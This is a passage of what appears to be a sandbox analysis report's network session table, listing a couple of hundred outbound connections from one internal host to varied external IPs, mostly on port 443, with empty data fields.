                              Session IDSource IPSource PortDestination IPDestination Port
                              11536192.168.2.1357386198.235.55.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11537192.168.2.135065669.67.248.242443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11538192.168.2.1334094188.49.178.128443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11539192.168.2.133732246.31.227.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11540192.168.2.13411584.36.131.122443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11541192.168.2.1343126151.12.246.54443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11542192.168.2.134298018.79.15.142443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11543192.168.2.134185838.239.145.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11544192.168.2.1359762167.244.116.9443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11545192.168.2.1356300144.71.237.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11546192.168.2.1337294129.17.145.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11547192.168.2.1354232207.12.186.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11548192.168.2.1356200113.215.243.187443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11549192.168.2.13393765.64.244.2443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11550192.168.2.1356886150.71.10.233443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11551192.168.2.134511298.88.161.79443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11552192.168.2.134794072.41.173.170443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11553192.168.2.1356916166.243.193.174443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11554192.168.2.134663867.182.10.127443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11555192.168.2.1356466106.146.36.210443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11556192.168.2.135277479.14.63.104443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11557192.168.2.1355220110.118.30.194443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11558192.168.2.1337664128.19.118.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11559192.168.2.1348118206.117.89.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11560192.168.2.1352978204.178.240.145443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11561192.168.2.1360490180.189.35.129443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11562192.168.2.1336750223.255.196.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11563192.168.2.1339798175.126.155.96443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11564192.168.2.133828612.99.232.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11565192.168.2.1337238195.212.77.209443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11566192.168.2.135861844.171.100.115443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11567192.168.2.135726662.89.9.68443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11568192.168.2.1354466219.134.183.90443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11569192.168.2.1334070143.64.68.133443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11570192.168.2.134809827.98.237.73443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11571192.168.2.133927619.154.157.140443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11572192.168.2.1354112165.168.62.191443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11573192.168.2.1355808188.206.226.138443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11574192.168.2.134510218.191.50.233443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11575192.168.2.1342102133.217.237.109443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11576192.168.2.133865851.10.212.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11577192.168.2.134604032.66.99.168443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11578192.168.2.135987270.197.74.123443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11579192.168.2.134316498.46.229.112443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11580192.168.2.134302853.7.103.41443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11581192.168.2.135963832.183.47.218443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11582192.168.2.1340332108.229.64.49443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11583192.168.2.1336050161.31.94.3443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11584192.168.2.135215490.185.116.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11585192.168.2.1352358190.47.254.107443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11586192.168.2.1334222125.78.109.69443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11587192.168.2.1345120138.122.97.120443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11588192.168.2.1343680186.77.173.128443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11589192.168.2.1338374141.50.149.116443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11590192.168.2.135483837.56.25.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11591192.168.2.1345030216.187.57.13443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11592192.168.2.1349738210.251.177.27443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11593192.168.2.134358287.203.243.213443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11594192.168.2.134325271.245.30.92443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11595192.168.2.1353970133.189.47.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11596192.168.2.1345158146.15.70.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11597192.168.2.1354044213.68.130.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11598192.168.2.134842874.247.215.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11599192.168.2.1342004103.146.202.197443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11600192.168.2.134650876.238.255.44443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11601192.168.2.1356996106.164.39.177443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11602192.168.2.134653620.232.193.51443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11603192.168.2.1337374191.154.248.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11604192.168.2.133688674.138.45.160443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11605192.168.2.13596242.235.48.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11606192.168.2.1350904167.41.137.252443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11607192.168.2.134483423.151.47.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11608192.168.2.1360372110.251.104.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11609192.168.2.133779685.204.86.23443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11610192.168.2.135825247.173.252.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11611192.168.2.1352648128.207.132.155443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11612192.168.2.135662444.25.78.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11613192.168.2.1356734217.152.95.239443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11614192.168.2.1337734141.185.186.138443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11615192.168.2.135930691.214.47.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11616192.168.2.1351948152.129.97.252443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11617192.168.2.134500451.168.152.132443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11618192.168.2.133637690.167.229.50443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11619192.168.2.135969499.89.145.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11620192.168.2.1342330158.162.197.15443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11621192.168.2.1337300148.149.96.206443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11622192.168.2.1344222223.55.151.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11623192.168.2.13525589.88.55.117443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11624192.168.2.1360188196.56.46.106443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11625192.168.2.133539275.23.171.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11626192.168.2.1344556131.214.124.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11627192.168.2.1353038223.167.218.29443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11628192.168.2.1343080187.31.210.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11629192.168.2.135906663.247.15.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11630192.168.2.1340934217.238.194.42443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11631192.168.2.1359160115.117.248.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11632192.168.2.1354682171.184.180.218443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11633192.168.2.1343424202.181.171.87443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11634192.168.2.134005254.132.177.171443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11635192.168.2.134010463.118.15.104443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11636192.168.2.134606894.231.213.29443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11637192.168.2.135028661.90.204.241443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11638192.168.2.135037237.56.39.62443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11639192.168.2.135067654.115.250.141443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11640192.168.2.134140050.59.26.168443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11641192.168.2.136078088.236.66.253443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11642192.168.2.13559805.204.143.151443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11643192.168.2.136095634.75.222.45443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11644192.168.2.1360994164.49.236.245443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11645192.168.2.13495042.81.60.5443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11646192.168.2.1354014171.166.110.228443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11647192.168.2.1350104205.92.11.33443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11648192.168.2.1344688118.63.60.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11649192.168.2.1337092210.250.121.19443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11650192.168.2.1334764124.94.21.1443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11651192.168.2.134169274.76.67.147443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11652192.168.2.1344592117.86.74.32443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11653192.168.2.1334512104.98.25.98443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11654192.168.2.13333064.127.8.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11655192.168.2.1356724203.152.26.194443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11656192.168.2.1350878101.210.245.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11657192.168.2.1352190139.164.73.246443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11658192.168.2.1349604153.31.214.221443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11659192.168.2.1340018205.139.102.241443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11660192.168.2.1337094108.215.133.242443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11661192.168.2.13533188.250.81.85443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11662192.168.2.1359552212.120.7.241443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11663192.168.2.1351730134.6.28.254443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11664192.168.2.1343006147.250.127.172443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11665192.168.2.1345182116.195.57.100443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11666192.168.2.1349294138.123.14.246443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11667192.168.2.1347852129.238.158.205443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11668192.168.2.1333132113.91.25.88443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11669192.168.2.1349790165.14.60.37443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11670192.168.2.1349634201.191.181.15443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11671192.168.2.135633280.71.24.200443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11672192.168.2.1357836209.5.81.21443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11673192.168.2.1347442136.11.10.179443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11674192.168.2.1355814100.153.31.242443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11675192.168.2.135378823.231.75.149443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11676192.168.2.135579413.246.130.21443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11677192.168.2.1335002203.124.178.136443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11678192.168.2.1354260125.132.67.210443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11679192.168.2.1335506116.14.175.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11680192.168.2.134845461.175.177.15443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11681192.168.2.1360446157.6.153.53443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11682192.168.2.1354252221.132.119.227443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11683192.168.2.134297467.231.208.11443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11684192.168.2.1352652143.172.241.131443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11685192.168.2.1334246170.168.154.116443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11686192.168.2.1351906184.108.3.90443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11687192.168.2.134641672.12.166.98443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11688192.168.2.1341128157.31.60.142443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11689192.168.2.1345884210.146.157.50443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11690192.168.2.1333834194.192.221.29443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11691192.168.2.1350030148.116.221.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11692192.168.2.1340188168.4.149.146443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11693192.168.2.1358794144.173.209.33443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11694192.168.2.134058246.186.88.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11695192.168.2.134745460.222.57.206443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11696192.168.2.134427853.241.132.4443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11697192.168.2.135066069.129.211.133443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11698192.168.2.1351132161.78.82.63443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11699192.168.2.135216065.46.127.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11700192.168.2.1354636135.81.27.249443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11701192.168.2.134180698.219.208.7443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11702192.168.2.1348858123.202.108.29443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11703192.168.2.135276083.233.170.127443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11704192.168.2.1350644131.162.122.114443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11705192.168.2.1352036145.99.164.35443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11706192.168.2.1351854211.189.195.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11707192.168.2.133430691.201.207.232443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11708192.168.2.134781824.83.131.177443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11709192.168.2.13470361.124.138.115443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11710192.168.2.1359364129.179.94.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11711192.168.2.136054442.229.140.49443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11712192.168.2.1349182128.41.31.110443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11713192.168.2.1351568199.99.225.121443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11714192.168.2.1345010108.22.9.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11715192.168.2.134353887.208.218.179443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11716192.168.2.1354818165.153.241.56443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11717192.168.2.1345718181.208.172.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11718192.168.2.134173645.147.77.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11719192.168.2.1339810139.65.147.55443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11720192.168.2.1353440119.190.116.199443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11721192.168.2.135163268.111.114.9443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11722192.168.2.135365461.250.106.97443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11723192.168.2.1335066195.105.15.174443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11724192.168.2.134247490.133.103.97443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11725192.168.2.135091624.240.252.151443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11726192.168.2.1357412213.122.90.224443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11727192.168.2.1348986210.62.164.61443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11728192.168.2.1359010160.146.232.44443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11729192.168.2.1345918180.8.207.88443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11730192.168.2.1358866148.137.75.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11731192.168.2.134688876.70.165.59443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11732192.168.2.134339249.220.45.47443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11733192.168.2.1346018107.97.83.194443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11734192.168.2.1360290104.25.185.2318080
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11735192.168.2.1355572210.234.45.108443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11736192.168.2.13371109.115.86.132443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11737192.168.2.1346796120.4.71.244443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11738192.168.2.134899436.140.62.145443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11739192.168.2.135158041.187.254.55443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11740192.168.2.13384945.178.205.181443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11741192.168.2.133407657.235.10.152443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11742192.168.2.135170644.179.164.90443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11743192.168.2.1353762173.81.185.243443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11744192.168.2.1353802219.114.65.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11745192.168.2.1341210121.150.43.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11746192.168.2.134505273.88.102.172443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11747192.168.2.135378674.83.25.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11748192.168.2.1355868140.175.109.253443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11749192.168.2.1350520210.149.157.162443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11750192.168.2.133313431.169.151.11443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11751192.168.2.1353732197.147.187.202443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11752192.168.2.1347508114.45.225.200443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11753192.168.2.1341334141.40.109.184443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11754192.168.2.1340900133.186.126.48443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11755192.168.2.1344182168.66.3.52443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11756192.168.2.1350172138.139.142.209443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11757192.168.2.1360846118.71.16.32443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11758192.168.2.1355596116.193.236.45443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11759192.168.2.1355628161.17.145.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11760192.168.2.1338606205.217.200.46443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11761192.168.2.1351202197.229.196.174443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11762192.168.2.134421453.70.249.179443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11763192.168.2.134414837.9.41.35443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11764192.168.2.135856461.133.161.31443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11765192.168.2.134241660.133.116.99443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11766192.168.2.135135660.233.93.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              11767192.168.2.1346706222.200.146.118443
                              TimestampBytes transferredDirectionData


